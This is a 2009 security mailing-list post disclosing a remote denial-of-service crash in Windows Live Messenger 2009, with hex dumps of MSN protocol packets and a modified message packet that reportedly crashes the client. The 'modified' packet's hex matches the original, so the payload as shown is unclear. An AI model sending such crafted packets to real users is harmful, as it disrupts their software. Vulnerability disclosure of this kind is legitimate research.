RE: hello bug in windows live messenger Feb 18 2009 06:56PM
rasod korad (r00tback yahoo com)

Author : Microsoft
Affected Software : Windows Live Messenger Version 2009 (build 14.0.8064.XXX)
Discovered by : Mr Ha1 : Morad Quraan
Date : 16/2/2009
Greats to : Toto , Xprincezuman , Ahmad Mars , Aousq , Navelove ;)
MSN : webmaster (at) arabicsecurity (dot) com [email concealed]
---- ------- ----- --------- ------- ------- ------ ------

i found Remote Denial of Service Lead WLM to Crash when you
Change the Chartset of Msg you send to something not found

{this packets sent form your pc when u try to send instant msg via msn}

Example :
1 192.168.1.100:2038 64.4.34.31:1863 11 Send
0000 58 46 52 20 32 32 20 53 42 0D 0A XFR 22 SB..

2 192.168.1.100:2229 64.4.37.43:1863 104 Send
0000 55 53 52 20 37 39 20 77 65 62 6D 61 73 74 65 72 USR 79 webmaster
0010 40 61 72 61 62 69 63 73 65 63 75 72 69 74 79 2E @arabicsecurity.
0020 63 6F 6D 3B 7B 32 35 32 42 46 30 36 38 2D 38 45 com;{252BF068-8E
0030 46 35 2D 34 30 33 31 2D 38 36 35 42 2D 36 45 34 F5-4031-865B-6E4
0040 44 31 42 35 37 38 43 39 41 7D 20 34 36 32 33 33 D1B578C9A} 46233
0050 39 35 33 38 2E 32 31 30 32 31 35 33 39 2E 32 34 9538.21021539.24
0060 32 31 38 33 36 37 0D 0A 218367..

3 192.168.1.100:2229 64.4.37.43:1863 37 Send
0000 43 41 4C 20 37 36 20 77 65 62 6D 61 73 74 65 72 CAL 76 webmaster
0010 40 61 72 61 62 69 63 73 65 63 75 72 69 74 79 2E @arabicsecurity.
0020 63 6F 6D 0D 0A com..

4 192.168.1.100:2229 64.4.37.43:1863 33 Send
0000 43 41 4C 20 37 37 20 68 61 63 6B 5F 61 6E 79 5F CAL 77 hack_any_
0010 6F 6E 65 40 68 6F 74 6D 61 69 6C 2E 63 6F 6D 0D one (at) hotmail (dot) com. [email concealed]
0020 0A .

5 192.168.1.100:2229 64.4.37.43:1863 146 Send
0000 4D 53 47 20 37 38 20 4E 20 31 33 32 0D 0A 4D 49 MSG 78 N 132..MI
0010 4D 45 2D 56 65 72 73 69 6F 6E 3A 20 31 2E 30 0D ME-Version: 1.0.
0020 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 .Content-Type: t
0030 65 78 74 2F 70 6C 61 69 6E 3B 20 63 68 61 72 73 ext/plain; chars
0040 65 74 3D 55 54 46 2D 38 0D 0A 58 2D 4D 4D 53 2D et=UTF-8..X-MMS-
0050 49 4D 2D 46 6F 72 6D 61 74 3A 20 46 4E 3D 41 72 IM-Format: FN=Ar
0060 61 62 69 63 25 32 30 54 72 61 6E 73 70 61 72 65 abic%20Transpare
0070 6E 74 3B 20 45 46 3D 42 3B 20 43 4F 3D 66 66 3B nt; EF=B; CO=ff;
0080 20 43 53 3D 62 32 3B 20 50 46 3D 32 0D 0A 0D 0A CS=b2; PF=2....
0090 68 69 hi

if we changed the last packet number 5 to :

5 192.168.1.100:2229 64.4.37.43:1863 146 Send
0000 4D 53 47 20 37 38 20 4E 20 31 33 32 0D 0A 4D 49 MSG 78 N 132..MI
0010 4D 45 2D 56 65 72 73 69 6F 6E 3A 20 31 2E 30 0D ME-Version: 1.0.
0020 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 .Content-Type: t
0030 65 78 74 2F 70 6C 61 69 6E 3B 20 63 68 61 72 73 ext/plain; chars
0040 65 74 3D 55 54 46 2D 38 0D 0A 58 2D 4D 4D 53 2D et=UTF-8.0.X-MMS-
0050 49 4D 2D 46 6F 72 6D 61 74 3A 20 46 4E 3D 41 72 IM-Format: FN=Ar
0060 61 62 69 63 25 32 30 54 72 61 6E 73 70 61 72 65 abic%20Transpare
0070 6E 74 3B 20 45 46 3D 42 3B 20 43 4F 3D 66 66 3B nt; EF=B; CO=ff;
0080 20 43 53 3D 62 32 3B 20 50 46 3D 32 0D 0A 0D 0A CS=b2; PF=2....
0090 68 69 hi

and resend the instant msg again to the target WLM will crash with this error :

AppName: msnmsgr.exe AppVer: 14.0.8064.206 ModName: msvcr80.dll
ModVer: 8.0.50727.1433 Offset: 0000faa3

poc code made and its not open source coz its patched version of messenger if u want it tell me how to give it to u

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus